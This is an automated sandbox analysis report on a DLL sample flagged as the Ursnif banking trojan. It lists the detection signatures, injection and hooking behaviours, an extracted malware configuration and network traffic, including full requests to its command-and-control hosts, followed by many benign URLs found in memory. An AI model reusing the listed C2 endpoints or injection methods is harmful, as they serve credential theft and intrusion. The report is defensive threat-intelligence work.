Analysis Report SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.24850

Overview

General Information

Sample Name: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.24850 (renamed file extension from 24850 to dll)
Analysis ID: 353290
MD5: 3964ec2fe493ed566a404e9dd33434a5
SHA1: bca121cbdfb1c1212c27de720bcaa5c3a6fa845c
SHA256: 3b98e6c87edfb4da99612025cf485d302d42c184e73bcb727f9807923bfa9850

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number, etc.) of a device
Registers a DLL
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://c56.lepini.at/jvassets/xI/t64.dates? Avira URL Cloud: Label: phishing
Source: http://c56.lepini.at:80/jvassets/xI/t64.dat Avira URL Cloud: Label: phishing
Found malware configuration
Source: regsvr32.exe.4616.1.memstr Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "159", "system": "6be03bf206b95c88679a31dc3afe7d5dhh", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613466324", "user": "1082ab698695dc15e71ab15cba7efddd", "hash": "0xf857f57e", "soft": "3"}
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll ReversingLabs: Detection: 13%

Compliance:

Uses 32bit PE files
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49742 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001C.00000002.404227102.000001796D8A0000.00000002.00000001.sdmp, csc.exe, 00000020.00000002.416522356.0000024FD6D20000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000025.00000000.452374047.0000000006FE0000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.420571619.0000000005A10000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.420571619.0000000005A10000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 00000022.00000002.475458101.0000021EAE11C000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000022.00000002.475458101.0000021EAE11C000.00000004.00000040.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000025.00000000.452374047.0000000006FE0000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001C3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_001C3512
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E54CF1 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 1_2_00E54CF1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E5B88D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_00E5B88D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E65518 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_00E65518
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E5834C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_00E5834C
Source: C:\Windows\explorer.exe Code function: 37_2_03B6AACC CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose, 37_2_03B6AACC
Source: C:\Windows\explorer.exe Code function: 37_2_03B67500 FindFirstFileW, 37_2_03B67500
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E516E1 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_00E516E1
Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user
Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache
Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows
Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft
Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local

Networking:

HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.20.185.68
Source: Joe Sandbox View IP Address: 151.101.1.44
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: global traffic HTTP traffic detected: GET /api1/mOmUNrUT1Tkf_/2Fpjx5UP/NjKT2TUVc9KVEb1kN7jSv_2/Bku6FvO8M8/iUmLw2_2FTDrkr5tf/cCMI7qZIJsl5/daUh7ottHLc/7HVIrVoY1SieQv/lhrGpaJPPzKF03EAwxNqA/D874ye_2FRUsy2K6/xciFCEzbH51FFw_/2Bb8QoHf6NpN75pZ5G/Mu_2BbqUp/c75ragbUEKlE0l1LX_2F/4u83BFS0FCNHpZrX6b9/sd4d4jezfNsCefQ_2B6iCK/p1XgqNgeBsVt9/izg8Zsvz/1FaNRSjvruwthZY1A7QfFWz/_2BhfXLKTN/ZLkri3_2BI/e8SUozS HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/bGCVCGUTs1lNc2K/wNnB3OIgI6UyqdAGOB/jV4rDmQEa/5PkUFdTsMYKfy1EIClwo/KQRRNWPakwmt0lLxrd_/2FnGpwvYpeqrU_2FkCLx1B/R0mLZmrbcN1d5/hbBQD152/5x461Zj3DyFi2OGwhSRW2md/1hWVGQOyCJ/9LQxsfDNoccGHcKv0/L78mf3QLu0Sk/zV1_2BT5Let/Cc_2Fk7brjJ8bV/ApfXsClf8J9xIYL4HHAXx/QKuHjRTsf_2BovXo/yHAF9g7T1kKJsDp/sou53PD1_2BzlwV1rz/X4cyCrwCA/3b0U_2Fa1EMmx0XXoDT3/0U2j_2FJCnPwGU3lAtd/LtXvsgZ HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/Ox2TG_2BNHSd/dGpyWpd7v99/zWuL24VyFCHbfP/RMw5PaV_2FkHP8EOsx_2B/QeZetVUX16Ewf2mC/SBZkUPvAhDEW0cg/Bvi6a1h8WxwumngpOl/pVeqsEO1u/F_2Bgph3G05TOwrcOQdP/pdQ6mtv5qQOyd5xTPSR/GNQoUS7yd_2BugnbKugLGo/sIvg7c3rbWlrV/jS2KL7Ow/TFCqCNRX_2BXcmpRqUKbNOU/wZGThNa5OD/T4CIs6JmdPw25wkmp/n5DpqgWckX6B/I9wndBIZWl3/VhxGkN2j0IRS2O/_2F8DuQj3M6qQfhTKxxpI/gFeX9K3CC7PaWcwb/Sw1f9EXRpo7/B HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000025.00000000.457290492.0000000008B68000.00000004.00000001.sdmp String found in binary or memory: :2021021620210217: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365 equals www.hotmail.com (Hotmail)
Source: RuntimeBroker.exe, 00000027.00000002.578594602.000001E767A41000.00000004.00000001.sdmp String found in binary or memory: FOLLOW US: www.twitter.com/g5games equals www.twitter.com (Twitter)
Source: RuntimeBroker.exe, 00000027.00000002.578989598.000001E767B42000.00000004.00000001.sdmp String found in binary or memory: Like us on Facebook: http://www.facebook.com/spotify equals www.facebook.com (Facebook)
Source: unknown DNS traffic detected: queries for: www.msn.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 16 Feb 2021 00:05:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000025.00000000.461748484.000000000F8A0000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: RuntimeBroker.exe, 00000027.00000002.578989598.000001E767B42000.00000004.00000001.sdmp String found in binary or memory: http://twitter.com/spotify:
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: RuntimeBroker.exe, 00000027.00000002.578948445.000001E767B23000.00000004.00000001.sdmp String found in binary or memory: http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000025.00000000.461748484.000000000F8A0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000001A.00000002.447464468.0000028E4D040000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.449500265.0000028E4D3EF000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
